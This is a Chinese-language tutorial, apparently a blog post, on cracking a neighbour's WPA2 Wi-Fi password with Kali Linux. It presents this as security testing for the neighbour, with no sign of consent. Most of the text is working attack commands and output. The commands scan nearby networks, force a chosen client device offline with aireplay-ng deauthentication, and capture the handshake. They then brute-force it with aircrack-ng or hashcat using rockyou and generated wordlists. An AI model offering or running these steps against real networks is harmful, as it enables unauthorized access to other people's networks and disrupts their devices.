基于技术研究今天试试用kali做渗透测试,帮助隔壁家的做安全测试,提前帮他发现漏洞。
原理
- 通过工具扫描附近所有wifi的 BSSID 和 CH
- 选择一个wifi
- 使用工具实时监听当前wifi与下面所有设备
- 通过wifi的 BSSID 和 设备mac地址,使其设备断网
- 一般设备断网后都会重连
- 这时步骤3就能抓到捂手包,包含加密后的密码
- 停止步骤3后会生成cap抓包文件
- 通过kali自带的字典库与 cap抓包文件对比,直到密码匹配为止。(有可能字典不包含匹配的密码,导致匹配失败)
准备工具
软件
- mac系统
- vmware (Windows VM | Workstation Pro | VMware)
- kali 镜像 (Get Kali | Kali Linux)
硬件
- usb无线网卡(RT3070L),(pdd 搜索 kali无线网卡即可,注意要买支持接收和发送,免驱动的)
预备动作
- 解压kali镜像
- vmware加载镜像
- 插入usb无线网卡
- 在连接设备勾选usb设备
实战
1. 启动
# 进入root模式 默认账号+密码 kali
sudo -i
# 查看当前设备
ifconfig # 一般显示wlan0:
# 开始监听模式
airmon-ng start wlan0
# 再次查看当前设备
ifconfig # 一般显示wlan0mon: 证明成功
2. 搜索所有wifi信息
# 开始监听
airodump-ng wlan0mon
# 显示如下
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:23:F5:74:DC:00 -71 4 0 0 6 130 WPA2 CCMP PSK CMCC-6xZa
FC:7A:58:07:D5:85 -85 2 1 0 6 360 WPA2 CCMP PSK 6-30C
84:76:37:09:73:B4 -80 5 0 0 6 270 WPA2 CCMP PSK Huang08
F0:B4:29:FE:E8:03 -83 4 0 0 11 130 WPA2 CCMP PSK 20E
# 记住想要连接的 BSSID 和 CH ,
#如:
#CMCC-6xZa
#BSSID: 28:23:F5:74:DC:00
#CH: 6
3. 开始监听 指定wifi
开始针对CMCC-6xZa 实时抓包 # -c 后面是CH , -w后面是保存的地址 , wlan0mon就是进入监听后的网卡名
# 监听命令
airodump-ng -c 6 --bssid 28:23:F5:74:DC:00 -w /home/kali/Desktop/bb wlan0mon
# 此时会进入不断的扫描连接的报文,并且保存的本地,当获取的报文会有右上角会有提示‘’,并且生成关键文件
# 输出下面内容
CH 2 ][ Elapsed: 24 s ][ 2023-08-04 12:39 ][ WPA handshake: 0C:D8:6C:85:2C
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AU
0C:D8:6C:85:2C:3E -60 2 187 20 2 2 270 WPA2 CCMP PS
BSSID STATION PWR Rate Lost Frames Notes
0C:D8:6C:85:2C:3E EC:5C:68:71:A2:89 -60 0 - 1 0 1
0C:D8:6C:85:2C:3E CE:79:05:6E:18:A9 -80 0 -24 0 57
0C:D8:6C:85:2C:3E D6:D4:9E:72:DB:F0 -76 1e-24 0 3
0C:D8:6C:85:2C:3E B2:59:47:02:C9:4C -84 1e- 2e 428 3891 EAPOL c
4. 开始让指定wifi的指定设备断连
# 另外启动一个命令行工具
# 输入以下命令使其设备在该网络下的具体某个终端断连,由于设备断连后会自动重新连接,所以可以让上面的监听获取到报文, 10是发起的次数, -a 是BSSID , -c 后面是具体某个终端的mac地址,
aireplay-ng -0 10 -a 28:23:F5:74:DC:00 -c B2:59:47:02:C9:4C wlan0mon
5. 破解,匹配报文
- aircrack-ng破解,效率低
# aircrack-ng破解
aircrack-ng -a2 -b 28:23:F5:74:DC:00 -w /usr/share/wordlists/rockyou.txt /home/kali/Desktop/bb-01.cap
# -b 指定BSSID
# /usr/share/wordlists/rockyou.txt 为提前生成好的字典
# /home/kali/Desktop/bb-02.cap 为步骤3生成的抓包文件
- Hashcat,效率高
# 先把cap转化成hccap
aircrack-ng <out.cap> -J <out.hccap>
aircrack-ng bb-02.cap -J bb-02.hccap
# kali自带hashcat,没有可以自己安装
# 安装hashcat
git clone https://github.com/hashcat/hashcat.git
# 进入目录sudo make
cd hashcat
#安装hashcat
sudo make install
# hashcat开始破解
hashcat -m 22000 bb-02.hccap /usr/share/wordlists/rockyou.txt
5.1 获取字典
# 获取字典方法1 kali自带
wordlists
# 会提示是否是否解压 输入Y
Do you want to extract the wordlist rockyou.txt? [Y/n] y
# 会生成关键文件 rockyou.txt
/usr/share/wordlists/rockyou.txt
# 获取字典方法2 通过网络下载或同步共享文件夹
https://github.com/conwnet/wpa-dictionary
https://drive.google.com/u/0/uc?id=1L1mDFRJAcShwU1gBAbECkx7OR_C7Ef90&export=download
# 获取字典方法3 共享文件夹
# 1.安装驱动
apt-get install open-vm-tools-desktop fuse
# 2.在vmware 打开共享开关,并且设置共享文件夹为share
# 3.在kali 创建共享路径
mkdir -p /mnt/hgfs/share
# 4. 挂载
/usr/bin/vmhgfs-fuse .host:/share /mnt/hgfs/share -o subtype=vmhgfs-fuse,allow_other
# 5.把要操作东西都往share放
5.2自己生成字典
# 生成8位数字密码
crunch 8 8 0123456789 -o dic.txt